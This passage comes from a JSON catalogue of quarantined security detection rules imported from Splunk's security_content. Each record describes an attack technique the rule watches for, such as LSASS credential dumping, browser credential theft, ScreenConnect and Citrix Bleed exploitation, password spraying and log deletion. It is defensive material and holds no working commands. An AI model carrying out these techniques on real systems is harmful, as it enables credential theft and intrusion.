"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hosts_file_access.yml" } }, { "id": "splunk-security-content-b3632472-310b-11ec-9aab-acde48001122", "type": "detection", "name": "WinEvent Windows Task Scheduler Event Action Started", "description": "The following analytic detects the execution of tasks registered in Windows Task Scheduler by monitoring EventID 200 (action run) and 201 (action completed) from the Task Scheduler logs. This detection leverages Task Scheduler logs to identify potentially suspicious or unauthorized task executions. Monitoring these events is significant for a SOC as it helps uncover evasive techniques used for persistence, unauthorized code execution, or other malicious activities. If confirmed malicious, this activity could lead to unauthorized access, data exfiltration, or the execution of harmful payloads, posing a significant threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winevent-windows-task-scheduler-event-action-started.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3632472-310b-11ec-9aab-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winevent_windows_task_scheduler_event_action_started.yml" } }, { "id": "splunk-security-content-b36b23ea-763c-417b-bd4a-6a378dabad1a", "type": "detection", "name": "Windows Credentials from Web Browsers Saved in TEMP Folder", "description": "The following analytic detects the creation of files containing passwords, cookies, and saved login account information by the Braodo stealer malware in temporary folders. Braodo often collects these credentials from browsers and applications, storing them in temp directories before exfiltration. This detection focuses on monitoring for the creation of files with patterns or formats commonly associated with stolen credentials. By identifying these activities, security teams can take needed action to prevent sensitive login data from being leaked, reducing the risk of unauthorized access to user accounts and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-web-browsers-saved-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b36b23ea-763c-417b-bd4a-6a378dabad1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_web_browsers_saved_in_temp_folder.yml" } }, { "id": "splunk-security-content-b38932ad-e663-4e90-bfdf-8446ee5b3f34", "type": "detection", "name": "Cisco Duo Admin Login Unusual Browser", "description": "The following analytic identifies instances where a Duo admin logs in using a browser other than Chrome, which is considered unusual based on typical access patterns. Please adjust as needed to your environment. The detection leverages Duo activity logs ingested via the Cisco Security Cloud App and filters for admin login actions where the browser is not Chrome. By renaming and aggregating relevant fields such as user, browser, IP address, and location, the analytic highlights potentially suspicious access attempts that deviate from the norm. This behavior is significant for a SOC because the use of an unexpected browser may indicate credential compromise, session hijacking, or the use of unauthorized devices by attackers attempting to evade detection. Detecting such anomalies enables early investigation and response, helping to prevent privilege escalation, policy manipulation, or further compromise of sensitive administrative accounts. The impact of this attack could include unauthorized changes to security policies, user access, or the disabling of critical security controls, posing a substantial risk to the organizations security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-admin-login-unusual-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b38932ad-e663-4e90-bfdf-8446ee5b3f34", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_admin_login_unusual_browser.yml" } }, { "id": "splunk-security-content-b3b7ce35-fce5-4c73-85f4-700aeada81a9", "type": "detection", "name": "Windows Credential Dumping LSASS Memory Createdump", "description": "The following analytic detects the use of CreateDump.exe to perform a process dump. This binary is not native to Windows and is often introduced by third-party applications, including PowerShell 7. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, GUIDs, and complete command-line executions. This activity is significant as it may indicate an attempt to dump LSASS memory, which can be used to extract credentials. If confirmed malicious, this could lead to unauthorized access and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credential-dumping-lsass-memory-createdump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3b7ce35-fce5-4c73-85f4-700aeada81a9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credential_dumping_lsass_memory_createdump.yml" } }, { "id": "splunk-security-content-b3f7a803-e802-448b-8eb2-e796b223bccc", "type": "detection", "name": "Nginx ConnectWise ScreenConnect Authentication Bypass", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1709 vulnerability, which allows attackers to bypass authentication via alternate paths or channels. It leverages Nginx access logs to identify web requests to the SetupWizard.aspx page, indicating potential exploitation. This activity is significant as it can lead to unauthorized administrative access and remote code execution. If confirmed malicious, attackers could create administrative users and gain full control over the affected ScreenConnect instance, posing severe security risks. Immediate remediation by updating to version 23.9.8 or above is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/nginx-connectwise-screenconnect-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b3f7a803-e802-448b-8eb2-e796b223bccc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/nginx_connectwise_screenconnect_authentication_bypass.yml" } }, { "id": "splunk-security-content-b44bebd6-bd39-467b-9321-73971bcd1aac", "type": "detection", "name": "Detect ARP Poisoning", "description": "The following analytic detects ARP Poisoning attacks by monitoring for Dynamic ARP Inspection (DAI) errors on Cisco network devices. It leverages logs from Cisco devices, specifically looking for events where the ARP inspection feature has disabled an interface due to suspicious activity. This activity is significant because ARP Poisoning can allow attackers to intercept, modify, or disrupt network traffic, leading to potential data breaches or denial of service. If confirmed malicious, this could enable attackers to perform man-in-the-middle attacks, compromising the integrity and confidentiality of network communications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-arp-poisoning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b44bebd6-bd39-467b-9321-73971bcd1aac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_arp_poisoning.yml" } }, { "id": "splunk-security-content-b44f6ac6-0429-11ec-87e9-acde48001122", "type": "detection", "name": "GetWmiObject User Account with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that utilize the `Get-WmiObject` cmdlet and the `Win32_UserAccount` parameter to query local user accounts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an attempt by adversaries to enumerate user accounts for situational awareness or Active Directory discovery. If confirmed malicious, this behavior could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-user-account-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b44f6ac6-0429-11ec-87e9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_user_account_with_powershell.yml" } }, { "id": "splunk-security-content-b483804a-4cc0-49a4-9f00-ac29ba844d08", "type": "detection", "name": "Windows Process Executed From Removable Media", "description": "This analytic is used to identify when a removable media device is attached to a machine and then a process is executed from the same drive letter assigned to the removable media device. Adversaries and Insider Threats may use removable media devices for several malicious activities, including initial access, execution, and exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1025", "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-executed-from-removable-media.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b483804a-4cc0-49a4-9f00-ac29ba844d08", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_executed_from_removable_media.yml" } }, { "id": "splunk-security-content-b49b6ef4-57cd-4d42-bd7e-64e00f11cc87", "type": "detection", "name": "Crowdstrike User Weak Password Policy", "description": "The following analytic detects CrowdStrike alerts for weak password policy violations, identifying instances where passwords do not meet the required security standards. These alerts highlight potential vulnerabilities that could be exploited by attackers, emphasizing the need for stronger password practices. Addressing these alerts promptly helps to enhance overall security and protect sensitive information from unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-user-weak-password-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b49b6ef4-57cd-4d42-bd7e-64e00f11cc87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_user_weak_password_policy.yml" } }, { "id": "splunk-security-content-b4d4217a-6673-4fb6-837d-07a522bdf9f7", "type": "detection", "name": "ESXi System Information Discovery", "description": "This detection identifies the use of ESXCLI system-level commands that retrieve configuration details. While used for legitimate administration, this behavior may also indicate adversary reconnaissance aimed at profiling the ESXi host's capabilities, build information, or system role in preparation for further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-system-information-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b4d4217a-6673-4fb6-837d-07a522bdf9f7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_system_information_discovery.yml" } }, { "id": "splunk-security-content-b509bbd3-0331-4aaa-8e4a-d2affe100af6", "type": "detection", "name": "Linux Deletion Of Services", "description": "The following analytic detects the deletion of services on a Linux machine. It leverages filesystem event logs to identify when service files within system directories (e.g., /etc/systemd/, /lib/systemd/, /run/systemd/) are deleted. This activity is significant because attackers may delete or modify services to disable security features or evade defenses. If confirmed malicious, this behavior could indicate an attempt to impair system functionality or execute a destructive payload, potentially leading to system instability or data loss. Immediate investigation is required to determine the responsible process and user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b509bbd3-0331-4aaa-8e4a-d2affe100af6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_services.yml" } }, { "id": "splunk-security-content-b5541828-8ffd-4070-9d95-b3da4de924cb", "type": "detection", "name": "Suspicious writes to windows Recycle Bin", "description": "The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin. It leverages the Endpoint.Filesystem and Endpoint.Processes data models in Splunk to identify any process writing to the \"*$Recycle.Bin*\" file path, excluding explorer.exe. This activity is significant because it may indicate an attacker attempting to hide their actions, potentially leading to data theft, ransomware, or other malicious outcomes. If confirmed malicious, this behavior could allow an attacker to persist in the environment and evade detection by security tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-writes-to-windows-recycle-bin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5541828-8ffd-4070-9d95-b3da4de924cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_writes_to_windows_recycle_bin.yml" } }, { "id": "splunk-security-content-b593cac5-dd20-4358-972a-d945fefdaf17", "type": "detection", "name": "Citrix ADC and Gateway Unauthorized Data Disclosure", "description": "The following analytic detects attempts to exploit the Citrix Bleed vulnerability (CVE-2023-4966), which can lead to the leaking of session tokens. It identifies HTTP requests with a 200 status code targeting the /oauth/idp/.well-known/openid-configuration URL endpoint. By parsing web traffic and filtering based on user agent details, HTTP method, source and destination IPs, and sourcetype, it aims to identify potentially malicious requests. This activity is significant for a SOC because successful exploitation can allow attackers to impersonate legitimate users, bypass authentication, and access sensitive data. If confirmed malicious, it could lead to unauthorized data access, network propagation, and critical information exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-adc-and-gateway-unauthorized-data-disclosure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b593cac5-dd20-4358-972a-d945fefdaf17", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_adc_and_gateway_unauthorized_data_disclosure.yml" } }, { "id": "splunk-security-content-b5b91200-5f27-11ec-bb4e-acde48001122", "type": "detection", "name": "Linux Possible Append Cronjob Entry on Existing Cronjob File", "description": "The following analytic detects potential tampering with cronjob files on a Linux system by identifying 'echo' commands that append code to existing cronjob files. It leverages logs from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because adversaries often use it for persistence or privilege escalation. If confirmed malicious, this could allow attackers to execute unauthorized code automatically, leading to system compromises and unauthorized data access, thereby impacting business operations and data integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-append-cronjob-entry-on-existing-cronjob-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5b91200-5f27-11ec-bb4e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_append_cronjob_entry_on_existing_cronjob_file.yml" } }, { "id": "splunk-security-content-b5baa09a-7a05-11ec-8da4-acde48001122", "type": "detection", "name": "Excessive File Deletion In WinDefender Folder", "description": "The following analytic detects excessive file deletion events in the Windows Defender folder. It leverages Sysmon EventCodes 23 and 26 to identify processes deleting multiple files within this directory. This behavior is significant as it may indicate an attempt to corrupt or disable Windows Defender, a key security component. If confirmed malicious, this activity could allow an attacker to disable endpoint protection, facilitating further malicious actions without detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-file-deletion-in-windefender-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5baa09a-7a05-11ec-8da4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_file_deletion_in_windefender_folder.yml" } }, { "id": "splunk-security-content-b5cd5526-cce7-11eb-b3bd-acde48001122", "type": "detection", "name": "WMI Recon Running Process Or Services", "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104, where WMI performs an event query to list running processes or services. This detection leverages PowerShell Script Block Logging to capture and analyze script block text for specific WMI queries. This activity is significant as it is commonly used by malware and APT actors to map security applications or services on a compromised machine. If confirmed malicious, this could allow attackers to identify and potentially disable security defenses, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-recon-running-process-or-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5cd5526-cce7-11eb-b3bd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_recon_running_process_or_services.yml" } }, { "id": "splunk-security-content-b5e3b024-a7bb-4019-8975-46cf54485e78", "type": "detection", "name": "ESXi Account Modified", "description": "This detection identifies the creation, deletion, or modification of a local user account on an ESXi host. This activity may indicate unauthorized access, indicator removal, or persistence attempts by an attacker seeking to establish or maintain control of the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1078", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-account-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5e3b024-a7bb-4019-8975-46cf54485e78", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_account_modified.yml" } }, { "id": "splunk-security-content-b5eed06d-5c97-4092-a3a1-fa4b7e77c71a", "type": "detection", "name": "Linux Auditd Service Started", "description": "The following analytic detects the suspicious service started. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-service-started.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b5eed06d-5c97-4092-a3a1-fa4b7e77c71a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_service_started.yml" } }, { "id": "splunk-security-content-b62a6040-49f4-47c8-b3f6-fc1adb952a33", "type": "detection", "name": "Windows Application Layer Protocol RMS Radmin Tool Namedpipe", "description": "The following analytic detects the use of default or publicly known named pipes associated with the RMX remote admin tool. It leverages Sysmon EventCodes 17 and 18 to identify named pipe creation and connection events. This activity is significant as the RMX tool has been abused by adversaries and malware like Azorult to collect data from targeted hosts. If confirmed malicious, this could indicate unauthorized remote administration capabilities, leading to data exfiltration or further compromise of the affected system. Immediate investigation is required to determine the legitimacy of this tool's presence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-application-layer-protocol-rms-radmin-tool-namedpipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b62a6040-49f4-47c8-b3f6-fc1adb952a33", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_application_layer_protocol_rms_radmin_tool_namedpipe.yml" } }, { "id": "splunk-security-content-b6391b15-e913-4c2c-8949-9eecc06efacc", "type": "detection", "name": "Detect Password Spray Attack Behavior From Source", "description": "The following analytic identifies one source failing to authenticate with 10 or more unique users. This behavior could represent an adversary performing a Password Spraying attack to obtain initial access or elevate privileges. This logic can be used for real time security monitoring as well as threat hunting exercises and works well against any number of data sources ingested into the CIM datamodel. Environments can be very different depending on the organization. Test and customize this detections thresholds if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-password-spray-attack-behavior-from-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b6391b15-e913-4c2c-8949-9eecc06efacc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_password_spray_attack_behavior_from_source.yml" } }, { "id": "splunk-security-content-b66aeaa4-586f-428b-8a2b-c4fd3039d8d3", "type": "detection", "name": "O365 Email Receive and Hard Delete Takeover Behavior", "description": "The following analytic identifies when an O365 email recipient receives and then deletes emails related to password or banking/payroll changes within a short period. This behavior may indicate a compromised account where the threat actor is attempting to redirect the victims payroll to an attacker controlled bank account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485", "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-receive-and-hard-delete-takeover-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b66aeaa4-586f-428b-8a2b-c4fd3039d8d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_receive_and_hard_delete_takeover_behavior.yml" } }, { "id": "splunk-security-content-b681977c-d90c-4efc-81a5-c58f945fb541", "type": "detection", "name": "Windows AD Short Lived Domain Account ServicePrincipalName", "description": "The following analytic identifies the addition and quick deletion of a Service Principal Name (SPN) to a domain account within 5 minutes. This detection leverages EventCode 5136 from the Windows Security Event Log, focusing on changes to the servicePrincipalName attribute. This activity is significant as it may indicate an attempt to perform Kerberoasting, a technique used to crack the cleartext password of a domain account offline. If confirmed malicious, this could allow an attacker to gain unauthorized access to sensitive information or escalate privileges within the domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-short-lived-domain-account-serviceprincipalname.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b681977c-d90c-4efc-81a5-c58f945fb541", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_short_lived_domain_account_serviceprincipalname.yml" } }, { "id": "splunk-security-content-b686d0bd-cca7-44ca-ae07-87f6465131d9", "type": "detection", "name": "O365 Service Principal Privilege Escalation", "description": "This detection identifies when an Azure Service Principal elevates privileges by adding themself to a new app role assignment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-service-principal-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b686d0bd-cca7-44ca-ae07-87f6465131d9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_service_principal_privilege_escalation.yml" } }, { "id": "splunk-security-content-b690df8c-a145-11eb-a38b-acde48001122", "type": "detection", "name": "SearchProtocolHost with no Command Line with Network", "description": "The following analytic detects instances of searchprotocolhost.exe running without command line arguments but with an active network connection. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process execution and network traffic data. It is significant because searchprotocolhost.exe typically runs with specific command line arguments, and deviations from this norm can indicate malicious activity, such as Cobalt Strike usage. If confirmed malicious, this activity could allow attackers to establish network connections for command and control, potentially leading to data exfiltration or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/searchprotocolhost-with-no-command-line-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b690df8c-a145-11eb-a38b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/searchprotocolhost_with_no_command_line_with_network.yml" } }, { "id": "splunk-security-content-b6e0ff70-b122-4227-9368-4cf322ab43c3", "type": "detection", "name": "USN Journal Deletion", "description": "The following analytic detects the deletion of the USN Journal using the fsutil.exe utility. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because the USN Journal maintains a log of all changes made to files on the disk, and its deletion can be an indicator of an attempt to cover tracks or hinder forensic investigations. If confirmed malicious, this action could allow an attacker to obscure their activities, making it difficult to trace file modifications and potentially compromising incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/usn-journal-deletion.yaml", 